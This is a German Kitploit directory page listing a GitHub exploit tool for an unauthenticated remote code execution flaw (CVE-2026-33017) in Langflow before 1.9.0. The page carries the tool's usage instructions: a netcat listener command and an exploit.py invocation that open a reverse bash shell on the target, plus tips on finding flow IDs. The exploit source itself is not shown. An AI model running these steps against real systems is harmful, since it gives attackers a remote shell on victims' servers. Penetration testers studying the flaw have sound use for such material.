Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017-Exploit — Unauthentifizierte RCE in Langflow <1.9.0 (CVE-2026-33017) Exploit | Kitploit
Tools/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Unauthentifizierte RCE in Langflow <1.9.0 (CVE-2026-33017) Exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 MonatNoch nicht geprüft

Fireflow RCE Exploit

Ausführung von entferntem Code für Langflow über den build_public_tmp-Endpunkt.
Exploit über den Public Flow Build Endpunkt, der eine Reverse Shell auf dem Ziel ausführt.

Voraussetzungen

  • Python 3.8+
  • httpx-Bibliothek

Installation:

root@kitploit:~
pip install httpx

Verwendung

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

Argumente

  • -u, --url : Basis-URL der Langflow-Instanz (z.B. https://flow.example.com/)
  • -l, --lhost : Ihre IP-Adresse zum Empfangen der Reverse Shell
  • -p, --lport : Listening-Port für die Reverse Shell
  • -f --flow-id : Ziel-Flow-ID (erforderlich – abrufbar von /api/v1/flows/ oder der Benutzeroberfläche)
  • -c --client-id : Wert des client_id-Cookies zur Sitzungsidentifikation

Beispiel

  1. Starten Sie einen Listener:

    root@kitploit:~
    nc -nlvp 9001
    
  2. Führen Sie den Exploit aus:

    root@kitploit:~
    python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
    
  3. Bei Erfolg erhalten Sie eine interaktive Bash-Shell.

Wichtige Hinweise

  • Ein ReadTimeout ist normal – der Server antwortet möglicherweise nicht, weil die Shell die HTTP-Anfrage blockiert. Solange Sie eine Verbindung auf Ihrem Listener sehen, hat der Exploit funktioniert.
  • Eine gültige flow-id ist erforderlich. Listen Sie alle Flows über GET /api/v1/flows auf oder kopieren Sie sie aus der Browser-URL.
  • Dieses Tool ist ausschließlich für autorisierte Penetrationstests und zu Bildungszwecken bestimmt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.

Betroffene Versionen

  • Langflow-Versionen vor dem Fix für benutzerdefinierte Komponenten-RCE <1.9.0

Lizenz

MIT – für Bildungs- und ethische Sicherheitsforschung.

Tool herunterladen